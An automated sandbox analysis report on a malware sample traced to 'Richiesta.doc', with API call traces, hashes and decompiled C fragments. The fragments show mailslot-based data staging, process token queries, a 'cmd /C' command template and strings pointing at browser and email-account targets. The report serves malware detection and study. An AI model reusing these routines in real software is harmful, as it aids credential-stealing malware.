    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:AD22F7E25E6FCCF900B5060D4C5E9532
Total matches:141
Initial Analysis Report:Open
Initial sample Analysis ID:68439
Initial sample SHA 256:78E57715D0C6C12E90E96D82B3FF839B78C421F5EFF663AAB6D19DA5B6D82200
Initial sample name:Richiesta.doc

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
